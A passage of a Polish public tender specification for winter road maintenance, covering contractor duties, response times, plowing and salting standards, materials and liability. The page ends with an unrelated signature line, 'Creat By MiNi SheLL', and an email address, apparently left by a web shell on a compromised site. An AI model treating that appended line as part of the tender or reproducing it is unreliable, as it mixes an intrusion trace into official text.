3.	Wykonawca zobowiązany jest w okresie zimowym do przekazywania codziennych raportów (do godz. 700 każdego dnia za dzień poprzedni) określających prowadzenie akcji zimowej z wyszczególnieniem miejsc, które w czasie prowadzenia akcji były utrzymywane (wykaz dróg posypywanych i odpłużanych, oraz miejsc wyznaczonych posypywanych i odśnieżanych, krotności przejazdów, ilości użytych materiałów uszorstniających, godziny prowadzenia akcji) zgodnie z załącznikiem nr 1b  do SIWZ (wzór raportu dobowego).
4.	Wykonawca zobowiązany jest w okresie zimowym do pełnienia od dnia rozpoczęcia sezonu zimowego całodobowego dyżuru dyspozytorskiego w celu kierowania w ścisłej koordynacji z Zamawiającym pracami dotyczącymi usuwania skutków zimy.
5.	Wykonawca zobowiązany jest w okresie zimowym do zapewnienia ciągłej gotowości pozwalającej w sposób natychmiastowy, ze względu na zmieniające się warunki atmosferyczne prowadzić prace związane z zadaniami wynikającymi z zimowego utrzymania, przede wszystkim utrzymanie w sprawności technicznej wymaganego przez Zamawiającego sprzętu, oraz zapewnienie pełnego stanu osobowego pracowników koniecznych do realizacji tych zadań.
6.	Zamawiający wymaga, aby narzędzia i urządzenia wykorzystywane do zimowego utrzymania dróg wskazane w załączniku nr 10 do SIWZ użyte zostały  w pierwszej kolejności do zimowego utrzymania dróg Zamawiającego zgodnie z terminami określonymi w SIWZ. Po zakończeniu działań na rzecz Zamawiającego narzędzia i urządzenia mogą zostać wykorzystywane  do innych zadań Wykonawcy.
7.	Wykonawca musi dysponować osobami zdolnymi do udziału w realizacji zamówienia, które posiadają stosowne uprawnienia wymagane przepisami prawa. Wykonawca musi być dyspozycyjny i zgłaszać się na każde wezwanie Zamawiającego w celach związanych z realizację umowy (np. objazdy dróg, ustalanie rozliczeń). - załącznik 11 do SIWZ
8.	Wykonawca zobowiązany jest w okresie zimowym do dokonywania na każde wezwanie Zamawiającego wspólnych objazdów dróg celem oględzin stanu ich nawierzchni bez prawa domagania się dodatkowego wynagrodzenia (koszty powyższe Wykonawca winien skalkulować w cenie oferty).
9.	Wykonawca zobowiązany jest w okresie zimowym do przystąpienia do usuwania śniegu i likwidacji gołoledzi po wystąpieniu niekorzystnych warunków atmosferycznych bez zbędnej zwłoki (w ciągu 30 minut), przy czym wykonanie w/w czynności powinny zostać zakończone w następującym czasie:
a)	dla dróg I kolejności zimowego utrzymania - do 4 godz. po ustaniu opadów,
b)	dla dróg II kolejności zimowego utrzymania - do 6 godz. po ustaniu opadów.
10.	Wykonawca jest zobowiązany do natychmiastowego reagowania na każde zgłoszenie lub interwencję ze strony Zamawiającego.
11.	Ustala się następujące standardy zimowego utrzymania dróg:
a)	dla dróg I kolejności  II standard zimowego utrzymania,
b)	dla dróg II kolejności II standard zimowego utrzymania.
Wskazane standardy są tożsame (identyczne) jak w Zarządzeniu nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 25.10.1994r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych.
12.	Technologia zimowego utrzymania dróg:
a)	Płużenie:
- pługiem pracującym pojedynczo - na drogach jednokierunkowych i dwukierunkowych szerokości jezdni 6 metrów i poniżej,
- pługami pracującymi w zespole po 2 lub 3 - drogi szerokości jezdni powyżej 6 metrów.
b) Posypywanie:
- solą drogową o gęstości posypywania 30 g-m2 dla  II - go standardu zimowego utrzymania,  przy czym dopuszcza się alternatywnie użycie soli drogowej zwilżanej solanką o gęstości posypywania 20  g-m2, przy temperaturze poniżej -10 0C dopuszcza się użycie materiałów uszorstniających,
13.	Utrzymanie odcinków dróg w rejonie przystanków komunikacji publicznej w taki sposób, aby zapewnić bezpieczne (bez możliwości poślizgu) hamowanie i ruszanie pojazdów, utrzymywanie zatok przystankowych w taki sposób aby możliwe było swobodne i bezpieczne wysiadanie i wsiadanie do pojazdów komunikacji miejskiej. Zatoka autobusowa stanowi część drogi i powinna być utrzymywana w standardzie drogi.
14.	Utrzymanie odcinków dróg zlokalizowanych w rejonach skrzyżowań i podjazdów (wzniesienia i spadki dróg) w taki sposób, aby zapewnić bezpieczne (bez możliwości poślizgu) hamowanie i ruszanie pojazdów.
15.	Wykonawca zobowiązany jest stosować do zapobiegania powstawaniu i likwidacji śliskości na drogach materiały z atestem wg obowiązujących przepisów (m.in. środków chemicznych spełniających Polskie Normy przenoszące normy europejskie lub przenoszące normy innych państw członkowskich Europejskiego Obszaru Gospodarczego - stosowania  odpowiednich dawek materiałów do usuwania śliskości zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 października 2005r. w sprawie rodzajów materiałów i warunków stosowania środków, jakie mogą być używane na drogach  publicznych oraz ulicach i placach ( Dz.U. z  2005r. Nr 230 poz.1960 ) i przedłożenia na żądanie Zamawiającego atestu dopuszczającego środki do ich stosowania.
16.	Wykonawca we własnym zakresie zapewnia materiały do wykonania zleconych zadań oraz pokrywa koszty związane z zakupem środków chemicznych, soli drogowej, piasku, solanki i innych materiałów niezbędnych do realizacji zadań.
17.	Obowiązkiem Wykonawcy jest przystąpienie do realizacji zadania w takim zakresie, by nie spowodować sytuacji zagrożenia bezpieczeństwa w stosunku do uczestników ruchu na drogach oraz ruchu pieszego. W przypadku zaniedbań Wykonawca ponosi odpowiedzialność materialną w stosunku do poszkodowanych.
18.	Wykonawca jest zobowiązany do wykonywania prac objętych zamówieniem zgodnie z obowiązującymi normami i technologiami, zasadami wiedzy technicznej oraz zgodnie z obowiązującymi przepisami prawa.
19.	Przy realizacji zimowego utrzymania Wykonawca może stosować inne niż piasek materiały do zwiększenia szorstkości jezdni tylko za zgodą Zamawiającego.
20.	Wykonawca jest zobowiązany do zabezpieczenia terenu podczas wykonywania prac, o ile będzie to wymagane obowiązującymi przepisami prawa.
21.	Sól do usuwania skutków zimy winna spełniać normę dla soli drogowej.
22.	Zimowe utrzymanie dróg, chodników i miejsc wyznaczonych polega na usuwaniu śniegu i śliskości niezależnie od grubości warstwy śniegu lub lodu zalegającej na utrzymywanym terenie.
23.	Zamawiający może dokonać korekt (dodać, odjąć) odcinków dróg objętych działaniami zimowego utrzymania w ilości ?20% na danym zadaniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com